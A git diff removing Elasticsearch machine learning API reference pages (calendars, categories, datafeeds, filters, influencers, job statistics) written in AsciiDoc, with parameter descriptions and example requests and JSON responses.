-[[ml-get-calendar-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-calendar-desc]] -== {api-description-title} - -You can get information for multiple calendars in a single API request by using a -comma-separated list of ids or a wildcard expression. You can get -information for all calendars by using `_all`, by specifying `*` as the -``, or by omitting the ``. 
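For instance, the following sketch requests two calendars by a comma-separated list (the `holidays` calendar name here is hypothetical) and then all calendars via `_all`:

[source,console]
--------------------------------------------------
GET _ml/calendars/planned-outages,holidays

GET _ml/calendars/_all
--------------------------------------------------
// TEST[skip:illustration only]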
- -For more information, see -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[[ml-get-calendar-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -[[ml-get-calendar-request-body]] -== {api-request-body-title} - -`page`.`from`:: -(Optional, integer) Skips the specified number of calendars. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of calendars to obtain. - -[[ml-get-calendar-results]] -== {api-response-body-title} - -The API returns an array of calendar resources, which have the following -properties: - -`calendar_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=calendar-id] - -`job_ids`:: -(array) An array of {anomaly-job} identifiers. For example: `["total-requests"]`. - -[[ml-get-calendar-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/calendars/planned-outages --------------------------------------------------- -// TEST[skip:setup:calendar_outages_addjob] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "calendars": [ - { - "calendar_id": "planned-outages", - "job_ids": [ - "total-requests" - ] - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-category.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-category.asciidoc deleted file mode 100644 index e98bd282b9a..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-category.asciidoc +++ /dev/null @@ -1,164 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-category]] -= Get categories API -++++ -Get categories -++++ - -Retrieves {anomaly-job} results for one or more categories. - -[[ml-get-category-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/categories` + - -`GET _ml/anomaly_detectors//results/categories/` - -[[ml-get-category-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-category-desc]] -== {api-description-title} - -When `categorization_field_name` is specified in the job configuration, it is -possible to view the definitions of the resulting categories. A category -definition describes the common terms matched and contains examples of matched -values. - -The anomaly results from a categorization analysis are available as bucket, -influencer, and record results. For example, the results might indicate that -at 16:45 there was an unusual count of log message category 11. You can then -examine the description and examples of that category. For more information, see -{ml-docs}/ml-configuring-categories.html[Categorizing log messages]. - -[[ml-get-category-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, long) Identifier for the category, which is unique in the job. If you -specify neither the category ID nor the `partition_field_value`, the API returns -information about all categories. If you specify only the -`partition_field_value`, it returns information about all categories for the -specified partition. 
- -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-get-category-request-body]] -== {api-request-body-title} - -`page`.`from`:: -(Optional, integer) Skips the specified number of categories. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of categories to obtain. - -`partition_field_value`:: -(Optional, string) Only return categories for the specified partition. - -[[ml-get-category-results]] -== {api-response-body-title} - -The API returns an array of category objects, which have the following -properties: - -`category_id`:: -(unsigned integer) A unique identifier for the category. `category_id` is unique -at the job level, even when per-partition categorization is enabled. - - -`examples`:: -(array) A list of examples of actual values that matched the category. - -`grok_pattern`:: -experimental[] (string) A Grok pattern that could be used in {ls} or an ingest -pipeline to extract fields from messages that match the category. This field is -experimental and may be changed or removed in a future release. The Grok -patterns that are found are not optimal, but are often a good starting point for -manual tweaking. - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`max_matching_length`:: -(unsigned integer) The maximum length of the fields that matched the category. -The value is increased by 10% to enable matching for similar fields that have -not been analyzed. - -// This doesn't use the shared description because there are -// categorization-specific aspects to its use in this context -`partition_field_name`:: -(string) If per-partition categorization is enabled, this property identifies -the field used to segment the categorization. It is not present when -per-partition categorization is disabled. - -`partition_field_value`:: -(string) If per-partition categorization is enabled, this property identifies -the value of the `partition_field_name` for the category. It is not present when -per-partition categorization is disabled. - -`regex`:: -(string) A regular expression that is used to search for values that match the -category. - -`terms`:: -(string) A space separated list of the common tokens that are matched in values -of the category. - -`num_matches`:: -(long) The number of messages that have been matched by this category. This is -only guaranteed to have the latest accurate count after a job `_flush` or `_close` - -`preferred_to_categories`:: -(list) A list of `category_id` entries that this current category encompasses. -Any new message that is processed by the categorizer will match against this -category and not any of the categories in this list. 
This is only guaranteed -to have the latest accurate list of categories after a job `_flush` or `_close` - -[[ml-get-category-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/esxi_log/results/categories -{ - "page":{ - "size": 1 - } -} --------------------------------------------------- -// TEST[skip:todo] - -In this example, the API returns the following information: -[source,js] ----- -{ - "count": 11, - "categories": [ - { - "job_id" : "esxi_log", - "category_id" : 1, - "terms" : "Vpxa verbose vpxavpxaInvtVm opID VpxaInvtVmChangeListener Guest DiskInfo Changed", - "regex" : ".*?Vpxa.+?verbose.+?vpxavpxaInvtVm.+?opID.+?VpxaInvtVmChangeListener.+?Guest.+?DiskInfo.+?Changed.*", - "max_matching_length": 154, - "examples" : [ - "Oct 19 17:04:44 esxi1.acme.com Vpxa: [3CB3FB90 verbose 'vpxavpxaInvtVm' opID=WFU-33d82c31] [VpxaInvtVmChangeListener] Guest DiskInfo Changed", - "Oct 19 17:04:45 esxi2.acme.com Vpxa: [3CA66B90 verbose 'vpxavpxaInvtVm' opID=WFU-33927856] [VpxaInvtVmChangeListener] Guest DiskInfo Changed", - "Oct 19 17:04:51 esxi1.acme.com Vpxa: [FFDBAB90 verbose 'vpxavpxaInvtVm' opID=WFU-25e0d447] [VpxaInvtVmChangeListener] Guest DiskInfo Changed", - "Oct 19 17:04:58 esxi2.acme.com Vpxa: [FFDDBB90 verbose 'vpxavpxaInvtVm' opID=WFU-bbff0134] [VpxaInvtVmChangeListener] Guest DiskInfo Changed" - ], - "grok_pattern" : ".*?%{SYSLOGTIMESTAMP:timestamp}.+?Vpxa.+?%{BASE16NUM:field}.+?verbose.+?vpxavpxaInvtVm.+?opID.+?VpxaInvtVmChangeListener.+?Guest.+?DiskInfo.+?Changed.*" - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-datafeed-stats.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-datafeed-stats.asciidoc deleted file mode 100644 index d002973b8f6..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-datafeed-stats.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-datafeed-stats]] -= Get {dfeed} statistics API - -[subs="attributes"] -++++ -Get {dfeed} statistics -++++ - -Retrieves usage information for {dfeeds}. - -[[ml-get-datafeed-stats-request]] -== {api-request-title} - -`GET _ml/datafeeds//_stats` + - -`GET _ml/datafeeds/,/_stats` + - -`GET _ml/datafeeds/_stats` + - -`GET _ml/datafeeds/_all/_stats` - -[[ml-get-datafeed-stats-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-datafeed-stats-desc]] -== {api-description-title} - -You can get statistics for multiple {dfeeds} in a single API request by using a -comma-separated list of {dfeeds} or a wildcard expression. You can get -statistics for all {dfeeds} by using `_all`, by specifying `*` as the -``, or by omitting the ``. - -If the {dfeed} is stopped, the only information you receive is the -`datafeed_id` and the `state`. - -IMPORTANT: This API returns a maximum of 10,000 {dfeeds}. - -[[ml-get-datafeed-stats-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id-wildcard] -+ --- -If you do not specify one of these options, the API returns information about -all {dfeeds}. 
--- - -[[ml-get-datafeed-stats-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -[role="child_attributes"] -[[ml-get-datafeed-stats-results]] -== {api-response-body-title} - -The API returns an array of {dfeed} count objects. All of these properties are -informational; you cannot update their values. - -`assignment_explanation`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-datafeeds] - -`datafeed_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id] - -`node`:: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-datafeeds] -+ --- -[%collapsible%open] -==== -`attributes`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-attributes] - -`ephemeral_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-ephemeral-id] - -`id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-id] - -`name`::: -(string) -The node name. For example, `0-o0tOo`. - -`transport_address`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-transport-address] -==== --- - -`state`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-datafeed] - -`timing_stats`:: -(object) An object that provides statistical information about timing aspect of -this {dfeed}. -+ --- -[%collapsible%open] -==== -`average_search_time_per_bucket_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-bucket-avg] - -`bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`exponential_average_search_time_per_hour_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-exp-avg-hour] - -`job_id`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`search_count`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-count] - -`total_search_time_ms`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=search-time] -==== --- - - -[[ml-get-datafeed-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. 
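To see the `404` response described above, you can pair an expression that matches nothing with `allow_no_match=false`. This is only a sketch; the {dfeed} name pattern is made up:

[source,console]
--------------------------------------------------
GET _ml/datafeeds/datafeed-does-not-exist*/_stats?allow_no_match=false
--------------------------------------------------
// TEST[skip:illustration only]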
- -[[ml-get-datafeed-stats-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/datafeeds/datafeed-high_sum_total_sales/_stats --------------------------------------------------- -// TEST[skip:Kibana sample data started datafeed] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "datafeeds": [ - { - "datafeed_id": "datafeed-high_sum_total_sales", - "state": "started", - "node": { - "id": "2spCyo1pRi2Ajo-j-_dnPX", - "name": "node-0", - "ephemeral_id": "hoXMLZB0RWKfR9UPPUCxXX", - "transport_address": "127.0.0.1:9300", - "attributes": { - "ml.machine_memory": "17179869184", - "ml.max_open_jobs": "20" - } - }, - "assignment_explanation": "", - "timing_stats": { - "job_id" : "high_sum_total_sales", - "search_count" : 27, - "bucket_count" : 619, - "total_search_time_ms" : 296.0, - "average_search_time_per_bucket_ms" : 0.4781906300484653, - "exponential_average_search_time_per_hour_ms" : 33.28246548059884 - } - } - ] -} ----- -// TESTRESPONSE[s/"2spCyo1pRi2Ajo-j-_dnPX"/$body.$_path/] -// TESTRESPONSE[s/"node-0"/$body.$_path/] -// TESTRESPONSE[s/"hoXMLZB0RWKfR9UPPUCxXX"/$body.$_path/] -// TESTRESPONSE[s/"127.0.0.1:9300"/$body.$_path/] -// TESTRESPONSE[s/"17179869184"/$body.datafeeds.0.node.attributes.ml\\.machine_memory/] diff --git a/docs/reference/ml/anomaly-detection/apis/get-datafeed.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-datafeed.asciidoc deleted file mode 100644 index e622609df48..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-datafeed.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-datafeed]] -= Get {dfeeds} API - -[subs="attributes"] -++++ -Get {dfeeds} -++++ - -Retrieves configuration information for {dfeeds}. - -[[ml-get-datafeed-request]] -== {api-request-title} - -`GET _ml/datafeeds/` + - -`GET _ml/datafeeds/,` + - -`GET _ml/datafeeds/` + - -`GET _ml/datafeeds/_all` - -[[ml-get-datafeed-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-datafeed-desc]] -== {api-description-title} - -You can get information for multiple {dfeeds} in a single API request by using a -comma-separated list of {dfeeds} or a wildcard expression. You can get -information for all {dfeeds} by using `_all`, by specifying `*` as the -``, or by omitting the ``. - -IMPORTANT: This API returns a maximum of 10,000 {dfeeds}. - -[[ml-get-datafeed-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=datafeed-id-wildcard] -+ --- -If you do not specify one of these options, the API returns information about -all {dfeeds}. --- - -[[ml-get-datafeed-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-datafeeds] - -[[ml-get-datafeed-results]] -== {api-response-body-title} - -The API returns an array of {dfeed} resources. For the full list of properties, -see <>. - -[[ml-get-datafeed-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. 
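Because the identifier accepts wildcard expressions, a request such as the following sketch (assuming, as in the example below, that your {dfeed} names start with `datafeed-`) returns the configuration of every matching {dfeed} in one call:

[source,console]
--------------------------------------------------
GET _ml/datafeeds/datafeed-*
--------------------------------------------------
// TEST[skip:illustration only]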
- -[[ml-get-datafeed-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/datafeeds/datafeed-high_sum_total_sales --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "datafeeds": [ - { - "datafeed_id": "datafeed-high_sum_total_sales", - "job_id": "high_sum_total_sales", - "query_delay": "93169ms", - "indices": [ - "kibana_sample_data_ecommerce" - ], - "query" : { - "bool" : { - "filter" : [ - { - "term" : { - "_index" : "kibana_sample_data_ecommerce" - } - } - ] - } - }, - "scroll_size": 1000, - "chunking_config": { - "mode": "auto" - }, - "delayed_data_check_config" : { - "enabled" : true - } - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-filter.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-filter.asciidoc deleted file mode 100644 index a0c4a1697da..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-filter.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-filter]] -= Get filters API -++++ -Get filters -++++ - -Retrieves filters. - -[[ml-get-filter-request]] -== {api-request-title} - -`GET _ml/filters/` + - -`GET _ml/filters/` - -[[ml-get-filter-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-filter-desc]] -== {api-description-title} - -You can get a single filter or all filters. For more information, see -{ml-docs}/ml-rules.html[Machine learning custom rules]. - -[[ml-get-filter-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -[[ml-get-filter-query-parms]] -== {api-query-parms-title} - -`from`:: -(Optional, integer) Skips the specified number of filters. - -`size`:: -(Optional, integer) Specifies the maximum number of filters to obtain. - -[[ml-get-filter-results]] -== {api-response-body-title} - -The API returns an array of filter resources, which have the following -properties: - -`description`:: -(string) A description of the filter. - -`filter_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=filter-id] - -`items`:: -(array of strings) An array of strings which is the filter item list. - -[[ml-get-filter-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/filters/safe_domains --------------------------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -The API returns the following results: - -[source,console-result] ----- -{ - "count": 1, - "filters": [ - { - "filter_id": "safe_domains", - "description": "A list of safe domains", - "items": [ - "*.google.com", - "wikipedia.org" - ] - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-influencer.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-influencer.asciidoc deleted file mode 100644 index 94418a2b6ce..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-influencer.asciidoc +++ /dev/null @@ -1,161 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-influencer]] -= Get influencers API -++++ -Get influencers -++++ - -Retrieves {anomaly-job} results for one or more influencers. 
- -[[ml-get-influencer-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/influencers` - -[[ml-get-influencer-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-influencer-desc]] -== {api-description-title} - -Influencers are the entities that have contributed to, or are to blame for, -the anomalies. Influencer results are available only if an -`influencer_field_name` is specified in the job configuration. - -[[ml-get-influencer-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-get-influencer-request-body]] -== {api-request-body-title} - -`desc`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=desc-results] - -`end`:: -(Optional, string) Returns influencers with timestamps earlier than this time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] - -`influencer_score`:: -(Optional, double) Returns influencers with anomaly scores greater than or equal -to this value. - -`page`.`from`:: -(Optional, integer) Skips the specified number of influencers. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of influencers to obtain. - -`sort`:: -(Optional, string) Specifies the sort field for the requested influencers. By -default, the influencers are sorted by the `influencer_score` value. - -`start`:: -(Optional, string) Returns influencers with timestamps after this time. - -[[ml-get-influencer-results]] -== {api-response-body-title} - -The API returns an array of influencer objects, which have the following -properties: - -`bucket_span`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`influencer_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the influencer in this bucket aggregated across detectors. Unlike -`initial_influencer_score`, this value will be updated by a re-normalization -process as new data is analyzed. - -`influencer_field_name`:: -(string) The field name of the influencer. - -`influencer_field_value`:: -(string) The entity that influenced, contributed to, or was to blame for the -anomaly. - -`initial_influencer_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the influencer aggregated across detectors. This is the initial value that was -calculated at the time the bucket was processed. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`probability`:: -(number) The probability that the influencer has this behavior, in the range 0 -to 1. This value can be held to a high precision of over 300 decimal places, so -the `influencer_score` is provided as a human-readable and friendly -interpretation of this. - -`result_type`:: -(string) Internal. This value is always set to `influencer`. 
- -`timestamp`:: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timestamp-results] - -NOTE: Additional influencer properties are added, depending on the fields being -analyzed. For example, if it's analyzing `user_name` as an influencer, then a -field `user_name` is added to the result document. This information enables you to -filter the anomaly results more easily. - -[[ml-get-influencer-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/high_sum_total_sales/results/influencers -{ - "sort": "influencer_score", - "desc": true -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API returns the following information, sorted based on the -influencer score in descending order: -[source,js] ----- -{ - "count": 189, - "influencers": [ - { - "job_id": "high_sum_total_sales", - "result_type": "influencer", - "influencer_field_name": "customer_full_name.keyword", - "influencer_field_value": "Wagdi Shaw", - "customer_full_name.keyword" : "Wagdi Shaw", - "influencer_score": 99.02493, - "initial_influencer_score" : 94.67233079580171, - "probability" : 1.4784807245686567E-10, - "bucket_span" : 3600, - "is_interim" : false, - "timestamp" : 1574661600000 - }, - ... - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-job-stats.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-job-stats.asciidoc deleted file mode 100644 index 7b8de2662d4..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-job-stats.asciidoc +++ /dev/null @@ -1,477 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-job-stats]] -= Get {anomaly-job} statistics API -++++ -Get job statistics -++++ - -Retrieves usage information for {anomaly-jobs}. - -[[ml-get-job-stats-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//_stats` - -`GET _ml/anomaly_detectors/,/_stats` + - -`GET _ml/anomaly_detectors/_stats` + - -`GET _ml/anomaly_detectors/_all/_stats` - -[[ml-get-job-stats-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-job-stats-desc]] -== {api-description-title} - -You can get statistics for multiple {anomaly-jobs} in a single API request by -using a group name, a comma-separated list of jobs, or a wildcard expression. -You can get statistics for all {anomaly-jobs} by using `_all`, by specifying `*` -as the ``, or by omitting the ``. - -IMPORTANT: This API returns a maximum of 10,000 jobs. - -[[ml-get-job-stats-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-default] - -[[ml-get-job-stats-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -[role="child_attributes"] -[[ml-get-job-stats-results]] -== {api-response-body-title} - -The API returns the following information about the operational progress of a -job: - -`assignment_explanation`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=assignment-explanation-anomaly-jobs] - -//Begin data_counts -[[datacounts]]`data_counts`:: -(object) An object that describes the quantity of input to the job and any -related error counts. The `data_count` values are cumulative for the lifetime of -a job. 
If a model snapshot is reverted or old results are deleted, the job -counts are not reset. -+ -.Properties of `data_counts` -[%collapsible%open] -==== -`bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count-anomaly-jobs] - -`earliest_record_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=earliest-record-timestamp] - -`empty_bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=empty-bucket-count] - -`input_bytes`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-bytes] - -`input_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-field-count] - -`input_record_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=input-record-count] - -`invalid_date_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=invalid-date-count] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`last_data_time`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=last-data-time] - -`latest_empty_bucket_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-empty-bucket-timestamp] - -`latest_record_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-record-timestamp] - -`latest_sparse_bucket_timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=latest-sparse-record-timestamp] - -`missing_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=missing-field-count] -+ -The value of `processed_record_count` includes this count. - -`out_of_order_timestamp_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=out-of-order-timestamp-count] - -`processed_field_count`::: -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-field-count] - -`processed_record_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=processed-record-count] - -`sparse_bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=sparse-bucket-count] -==== -//End data_counts - -`deleting`:: -(Boolean) -Indicates that the process of deleting the job is in progress but not yet -completed. It is only reported when `true`. - -//Begin forecasts_stats -[[forecastsstats]]`forecasts_stats`:: -(object) An object that provides statistical information about forecasts -belonging to this job. Some statistics are omitted if no forecasts have been -made. -+ -NOTE: Unless there is at least one forecast, `memory_bytes`, `records`, -`processing_time_ms` and `status` properties are omitted. -+ -.Properties of `forecasts_stats` -[%collapsible%open] -==== -`forecasted_jobs`::: -(long) A value of `0` indicates that forecasts do not exist for this job. A -value of `1` indicates that at least one forecast exists. - -`memory_bytes`::: -(object) The `avg`, `min`, `max` and `total` memory usage in bytes for forecasts -related to this job. If there are no forecasts, this property is omitted. - -`processing_time_ms`::: -(object) The `avg`, `min`, `max` and `total` runtime in milliseconds for -forecasts related to this job. If there are no forecasts, this property is -omitted. - -`records`::: -(object) The `avg`, `min`, `max` and `total` number of `model_forecast` documents -written for forecasts related to this job. If there are no forecasts, this -property is omitted. - -`status`::: -(object) The count of forecasts by their status. For example: -{"finished" : 2, "started" : 1}. If there are no forecasts, this property is -omitted. 
- -`total`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=forecast-total] -==== -//End forecasts_stats - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -//Begin model_size_stats -[[modelsizestats]]`model_size_stats`:: -(object) An object that provides information about the size and contents of the -model. -+ -.Properties of `model_size_stats` -[%collapsible%open] -==== -`bucket_allocation_failures_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-allocation-failures-count] - -`categorized_doc_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorized-doc-count] - -`categorization_status`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-status] - -`dead_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dead-category-count] - -`failed_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=failed-category-count] - -`frequent_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequent-category-count] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`log_time`::: -(date) The timestamp of the `model_size_stats` according to server time. - -`memory_status`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-status] - -`model_bytes`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes] - -`model_bytes_exceeded`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes-exceeded] - -`model_bytes_memory_limit`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit-anomaly-jobs] - -`peak_model_bytes`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=peak-model-bytes] - -`rare_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=rare-category-count] - -`result_type`::: -(string) For internal use. The type of result. - -`total_by_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-by-field-count] - -`total_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-category-count] - -`total_over_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-over-field-count] - -`total_partition_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-partition-field-count] - -`timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-timestamp] -==== -//End model_size_stats - -//Begin node -[[stats-node]]`node`:: -(object) Contains properties for the node that runs the job. This information is -available only for open jobs. -+ -.Properties of `node` -[%collapsible%open] -==== -`attributes`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-attributes] - -`ephemeral_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-ephemeral-id] - -`id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-id] - -`name`::: -(string) -The node name. 
